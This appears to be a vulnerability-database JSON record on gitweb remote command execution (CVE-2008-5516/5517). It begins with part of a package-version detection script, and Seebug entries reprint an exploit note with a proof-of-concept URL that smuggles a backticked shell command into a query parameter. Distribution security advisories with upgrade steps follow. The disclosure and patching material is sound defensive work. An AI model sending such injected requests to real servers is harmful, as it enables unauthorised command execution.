isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-lasso\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblasso-java\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblasso3-dev\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-lasso\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblasso3\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7-dbg\", ver:\"0.9.7k-3.1etch2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7\", ver:\"0.9.7k-3.1etch2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", 
ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-0\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg1\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc0\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc11\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres9\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns22\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-data\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-doc\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-gui\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"hpijs-ppds\", ver:\"2.7.7+2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hpijs\", ver:\"2.7.7+2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-dbg\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul-common\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmjs1\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozillainterfaces-java\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmjs-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"spidermonkey-bin\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libnss3-tools\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-gnome-support\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-xpcom\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"netatalk\", ver:\"2.0.3-4+etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tar\", ver:\"1.15.1-2ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tar\", ver:\"1.18-2ubuntu1.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:02:42", "bulletinFamily": "exploit", "description": "No 
description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67749", "id": "SSV:67749", "title": "gitWeb 1.5.2 - Remote Command Execution", "type": "seebug", "sourceData": "\n # Exploit Title: gitWeb remote command execution\r\n# Date: 2009.06.19\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: -\r\n# Version: GIT 1.5.2\r\n# Tested on: debian linux, GIT 1.5.2\r\n# CVE: CVE-2008-5516 - CVE-2008-5517\r\n\r\n# Code:\r\n\r\n# The cgi script doesn't show the command output *blind command execution ;)*\r\n# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()\r\n\r\n\r\nsub git_object {\r\n # object is defined by:\r\n # - hash or hash_base alone\r\n # - hash_base and file_name\r\n my $type;\r\n\r\n # - hash or hash_base alone\r\n if ($hash || ($hash_base && !defined $file_name)) {\r\n my $object_id = $hash || $hash_base;\r\n\r\n my $git_command = git_cmd_str();\r\n open my $fd, \"-|\", \"$git_command cat-file -t $object_id 2>/dev/null\"\r\n or die_error('404 Not Found', \"Object does not exist\");\r\n $type = <$fd>;\r\n chomp $type;\r\n close $fd\r\n or die_error('404 Not Found', \"Object does not exist\");\r\n\r\n # - hash_base and file_name\r\n\r\n# Example\r\nhttp://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67749"}, {"lastseen": "2017-11-19T18:14:18", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2010-02-19T00:00:00", "published": "2010-02-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19134", "id": "SSV:19134", "title": "gitWeb v1.5.2 Remote Command Execution", "type": "seebug", "sourceData": "\n # Exploit Title: gitWeb 
remote command execution\r\n# Date: 2009.06.19\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: -\r\n# Version: GIT 1.5.2\r\n# Tested on: debian linux, GIT 1.5.2\r\n# CVE: CVE-2008-5516 - CVE-2008-5517\r\n \r\n# Code:\r\n \r\n# The cgi script doesn't show the command output *blind command execution ;)*\r\n# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()\r\n \r\n \r\nsub git_object {\r\n # object is defined by:\r\n # - hash or hash_base alone\r\n # - hash_base and file_name\r\n my $type;\r\n \r\n # - hash or hash_base alone\r\n if ($hash || ($hash_base && !defined $file_name)) {\r\n my $object_id = $hash || $hash_base;\r\n \r\n my $git_command = git_cmd_str();\r\n open my $fd, \"-|\", \"$git_command cat-file -t $object_id 2>/dev/null\"\r\n or die_error('404 Not Found', \"Object does not exist\");\r\n $type = <$fd>;\r\n chomp $type;\r\n close $fd\r\n or die_error('404 Not Found', \"Object does not exist\");\r\n \r\n # - hash_base and file_name\r\n \r\n# Example\r\nhttp://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19134"}], "debian": [{"lastseen": "2019-05-30T02:22:11", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1708-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJanuary 19, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : git-core\nVulnerability : shell command injection\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-5516 CVE-2008-5517\nDebian Bug : 512330\n\nIt was discovered that gitweb, the web interface for the Git version\ncontrol 
system, contained several vulnerabilities:\n\nRemote attackers could use crafted requests to execute shell commands on\nthe web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5516).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell commands\nwith the permission of the web server (CVE-2008-5517).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\n\nFor the unstable distribution (sid) and testing distribution (lenny),\nthe remote shell command injection issue (CVE-2008-5516) has been fixed\nin version 1.5.6-1. The other issue will be fixed soon.\n\nWe recommend that you upgrade your Git packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4.orig.tar.gz\n Size/MD5 checksum: 1054130 99bc7ea441226f792b6f796a838e7ef0\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1.diff.gz\n Size/MD5 checksum: 88583 47033ef17360b441eb508094a3ab6b2b\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1.dsc\n Size/MD5 checksum: 1097 b907083d358ff2dc892790569fe3a164\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/git-core/gitweb_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 89094 1dc1b790f989600d62ba2d347d890a43\n 
http://security.debian.org/pool/updates/main/g/git-core/git-daemon-run_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 55504 7d1a4bf7bf17f179f94f513fc56f1ffc\n http://security.debian.org/pool/updates/main/g/git-core/git-svn_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 100426 149f0e2dda76e4d7613200d530db9e67\n http://security.debian.org/pool/updates/main/g/git-core/gitk_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 99598 800ea1d003baf1e348fda3b661fc16ed\n http://security.debian.org/pool/updates/main/g/git-core/git-doc_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 453076 4d102f5051116516cf4cc45b10637871\n http://security.debian.org/pool/updates/main/g/git-core/git-email_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 62792 201df12660ca0b6180e5fa3c5e0a3543\n http://security.debian.org/pool/updates/main/g/git-core/git-arch_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 68508 1489a2af3d016ff8b1a4c612365870b8\n http://security.debian.org/pool/updates/main/g/git-core/git-cvs_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 94516 afef0aca9b13d1d50af28cbb0d9cc1aa\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_alpha.deb\n Size/MD5 checksum: 3101926 6422c5ad17a7248820c3c27195051b0c\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_amd64.deb\n Size/MD5 checksum: 2642144 b81b341dce9b234eb193d40decd1283b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_arm.deb\n Size/MD5 checksum: 2322772 d5c371c8f6f3923edaf880df795870e4\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_hppa.deb\n Size/MD5 checksum: 2693958 c519a9e4cfeda0f11fe92e23756c6759\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_i386.deb\n Size/MD5 checksum: 2340718 
94abafaa8e010240a6a2da50ca717217\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_ia64.deb\n Size/MD5 checksum: 3815660 9b0970058eecaf9abd12e5cc472d0434\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_mips.deb\n Size/MD5 checksum: 2784146 b345d0ffd96b307025924f99fed33e9e\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_mipsel.deb\n Size/MD5 checksum: 2801244 7067901dea12981db4f09e186888e5b3\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_powerpc.deb\n Size/MD5 checksum: 2638996 23afd3d0fc61699d0850793c2dbd0047\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_s390.deb\n Size/MD5 checksum: 2628016 8f29e9b8b465bf570e8ee7bf78e3437d\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_sparc.deb\n Size/MD5 checksum: 2301444 93f43ba8edfb78438a6d7d66b96e4816\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-01-19T20:53:57", "published": "2009-01-19T20:53:57", "id": "DEBIAN:DSA-1708-1:70883", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00015.html", "title": "[SECURITY] [DSA 1708-1] New Git packages fix remote code execution", "type": "debian", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "description": "### Background\n\nGIT - the stupid content tracker, the revision control system used by the Linux kernel team. \n\n### Description\n\nMultiple vulnerabilities have been reported in gitweb that is part of the git package: \n\n * Shell metacharacters related to git_search are not properly sanitized (CVE-2008-5516). \n * Shell metacharacters related to git_snapshot and git_object are not properly sanitized (CVE-2008-5517). \n * The diff.external configuration variable as set in a repository can be executed by gitweb (CVE-2008-5916). \n\n### Impact\n\nA remote unauthenticated attacker can execute arbitrary commands via shell metacharacters in a query. Remote attackers with write access to a git repository configuration can execute arbitrary commands with the privileges of the user running gitweb by modifying the diff.external configuration variable in the repository and sending a crafted query to gitweb. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll git users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-util/git-1.6.0.6\"", "modified": "2009-03-09T00:00:00", "published": "2009-03-09T00:00:00", "id": "GLSA-200903-15", "href": "https://security.gentoo.org/glsa/200903-15", "type": "gentoo", "title": "git: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2019-05-30T07:37:20", "bulletinFamily": "unix", "description": "New git packages are available for Slackware 12.0, 12.1, 12.2, and -current to\nfix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3546\n\nThere are other security issues related to gitweb, which Slackware does not\nship, but could be added to a Slackware install. These problems are also\nfixed with this update. The CVE entries for the gitweb issues may be found\nhere:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5517\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/git-1.6.1.3-i486-1_slack12.2.tgz: Upgraded to git-1.6.1.3.\n This fixes a vulnerability where running git-diff or git-grep on a hostile\n git repository would result in the execution of arbitrary code as the git user.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3546\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. 
This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/git-1.6.1.3-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/git-1.6.1.3-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/git-1.6.1.3-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-1.6.1.3-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n6c6af465722ff0abd8a796305ad4af21 git-1.6.1.3-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n362ac15da4f60b84b40b1ee0d4b60890 git-1.6.1.3-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n0766dc7d31229d4af357931a569cf38a git-1.6.1.3-i486-1_slack12.2.tgz\n\nSlackware -current package:\n69183cb0801be615924fc4c870bc9fb8 git-1.6.1.3-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg git-1.6.1.3-i486-1_slack12.2.tgz", "modified": "2009-02-20T17:06:57", "published": "2009-02-20T17:06:57", "id": "SSA-2009-051-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.414289", "title": "git", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:23", "bulletinFamily": "unix", "description": "It was discovered that Git did not properly handle long file paths. 
If a user were tricked into performing commands on a specially crafted Git repository, an attacker could possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not correctly handle shell metacharacters when processing certain commands. A remote attacker could send specially crafted commands to the Git server and execute arbitrary code with the privileges of the Git web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly restrict the diff.external configuration parameter. A local attacker could exploit this issue and execute arbitrary code with the privileges of the Git web server. This issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916)", "modified": "2009-02-18T00:00:00", "published": "2009-02-18T00:00:00", "id": "USN-723-1", "href": "https://usn.ubuntu.com/723-1/", "title": "Git vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}